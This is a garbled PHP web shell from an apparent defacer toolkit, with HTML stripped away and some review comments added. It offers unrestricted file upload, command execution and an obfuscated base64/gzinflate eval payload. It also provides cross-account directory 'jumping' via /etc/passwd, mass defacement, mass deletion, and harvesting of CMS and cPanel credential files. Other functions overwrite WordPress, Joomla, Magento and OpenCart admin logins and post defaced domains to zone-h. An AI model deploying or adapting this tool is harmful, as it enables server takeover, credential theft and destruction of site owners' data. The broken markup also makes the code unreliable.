'.$dir.' | |||
'.$file.' |
window.location='?ketikung'"; } if($_GET['page'] == "blank") { echo "Back"; exit(); } if(isset($_REQUEST['logout'])) { session_destroy(); echo ""; } if(!($_SESSION['forbidden'])) { ?>
'; echo " | |||||||||
+ IP Kamu Syg | : ".$_SERVER['REMOTE_ADDR']."
+ IP Server | : ".gethostbyname($_SERVER['HTTP_HOST'])." |
+ system | : ".php_uname()." |
+ Coded By | : ./TN.GIIK1210 :) |
+ Message | : - I'AM DEFACER | |
path : ';
// Choose the directory this request operates on: the `path` query parameter
// when it is present, otherwise the script's current working directory.
// NOTE(review): $_GET['path'] is used exactly as received; nothing in these
// lines confines it to a base directory, so the requester picks the location.
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
// Turn backslashes into forward slashes so the split below handles both
// separator styles.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
// Print the path one segment at a time.
foreach($paths as $id=>$pat){
// An empty first segment means the path began with '/': print the root slash.
if($pat == '' && $id == 0){
// $a is assigned here but is not read in the lines shown in this copy.
$a = true;
echo '/';
continue;
}
// Skip empty segments produced by doubled or trailing slashes.
if($pat == '') continue;
// NOTE(review): as printed here the segment, which can come from the request,
// is echoed without htmlspecialchars(); the markup that surrounded it is
// missing from this copy.
echo ''.$pat.'/';
}
// Handle a multipart upload sent in the `file` field and report the outcome.
// NOTE(review): the destination is $path (set earlier from $_GET['path'] or
// getcwd()) joined with the client-supplied file name. No extension, content
// type or file-name check is visible, and copy() is used instead of
// move_uploaded_file(), so any request that reaches this code can write a file
// of its choosing into a directory of its choosing.
// For defenders: multipart POSTs to this script in the web-server log, and
// files newly created in served directories, are the traces this branch leaves.
// The echo strings that follow are presumably page markup whose tags were lost
// in this copy.
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo 'UPLOADED SUCCES !!!!! '; }else{ echo ' '; } } echo ' |
'; echo " |
";
echo "Home";
echo "cp_reset_pw";
echo "Logout";
echo "Zone-h";
echo "Jumping";
echo "Symlink";
echo "Mass_deface";
echo "Mass_delete "; echo "Config_grab"; echo "auto_edit_user"; echo "End/Decode"; echo "Hash Generator"; echo "Adminer"; echo "Command"; echo "About"; echo ""; if($_GET['do'] == 'cmd') { echo' - Cpanel Reset Password '; ?> Gak Bisa Di Akses Onee Chan "; } else { echo " | |
';
}
elseif($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "";
}
if($_GET['to'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0 "; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick "; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK "; } else { echo "$url -> ERROR "; } } } else { echo " "; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile "; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo " ";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " ";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " ";
}
} else {
echo "'; eval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H'))); } elseif($_GET['to'] == 'jumping') { $i = 0; echo " ";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo " ";
} //MASS DELETE/////////////////////////
elseif($_GET['to'] == 'masse') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[Terhapus] $lokasi"; foreach($urls as $url) { $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $jrw = "[R] $url_user"; if(is_writable($url_user)) { $jrw = "[RW] $url_user"; } echo $jrw.""; } else { echo ' "; foreach($urls as $url) { $url = str_replace("www.", "", $url); $web_vh = "/var/www/".$vh[1]."/$url/httpdocs"; if(is_dir($web_vh) === true) { if(is_readable($web_vh)) { $i++; $jrw = "[R] $web_vh"; if(is_writable($web_vh)) { $jrw = "[RW] $web_vh"; } echo $jrw.""; } else { echo ' "; $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )"; } echo " "; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo " ";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo " ";
} else {
echo "Can't read /etc/passwd"); $idx = mkdir("./SimonXporn66Xploit_CONFIG", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("./SimonXporn66Xploit_CONFIG/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_3X0RC1ST) { $user_config_dir = "/home/$user_./SimonXporn66Xploit/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_./SimonXporn66Xploit/.my.cnf" => "cpanel", "/home/$user_./SimonXporn66Xploit/.accesshash" => "WHM-accesshash", "/home/$user_./SimonXporn66Xploit/public_html/vdo_config.php" => "Voodoo", "/home/$user_./SimonXporn66Xploit/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_./SimonXporn66Xploit/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_./SimonXporn66Xploit/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_./SimonXporn66Xploit/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/whm/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/forum/config.php" => "phpBB", "/home/$user_./SimonXporn66Xploit/public_html/sites/default/settings.php" => "Drupal", "/home/$user_./SimonXporn66Xploit/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_./SimonXporn66Xploit/public_html/app/etc/local.xml" => "Magento", "/home/$user_./SimonXporn66Xploit/public_html/joomla/configuration.php" => "Joomla", "/home/$user_./SimonXporn66Xploit/public_html/configuration.php" => "Joomla", "/home/$user_./SimonXporn66Xploit/public_html/wp/wp-config.php" => "WordPress", "/home/$user_./SimonXporn66Xploit/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_./SimonXporn66Xploit/public_html/wp-config.php" => "WordPress", 
"/home/$user_./SimonXporn66Xploit/public_html/admin/config.php" => "OpenCart", "/home/$user_./SimonXporn66Xploit/public_html/slconfig.php" => "Sitelok", "/home/$user_./SimonXporn66Xploit/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("3X0RC1ST_CONFIG/$user_jefri-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo " "; echo "CMS => Joomla "; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya "; } else { echo "Sitename => $site "; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa "; } else { $url_target = "Login => $target/wp-login.php "; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => Wordpress "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. 
"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config," "; } else { $url_target = "Login => $target/admin/ "; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => Magento "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa "; } else { $url_target = "Login => $target "; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => OpenCart "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. 
"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa "; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa "; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb "; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb "; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ] "; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb "; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb "; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ] "; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf." "; echo "CMS => Lokomedia "; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." 
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } } } } else { echo " Auto Edit User ConfigNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )"; } } elseif($_GET['do'] == 'endec') { @ini_set('output_buffering',0); @ini_set('display_errors', 0); $text = $_POST['code']; ?> Encode And Decode"; } elseif($_GET['do'] == 'hashgen') { $submit = $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; // password $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string $hash = md5($pass); // md5 hash #1 $md4 = hash("md4", $pass); $hash_md5 = md5($salt . $pass); // md5 hash with salt #2 $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3 $hash1 = sha1($pass); // sha1 hash #4 $sha256 = hash("sha256", $text); $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5 $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6 } echo '"; if($_POST['do_cmd']) { echo " ".exe($_POST['cmd']).""; } } if(isset($_GET['filesrc'])){ echo " Current File : ";
echo $_GET['filesrc'];
echo ' | |
'.$dir.' | |||
'.$file.' |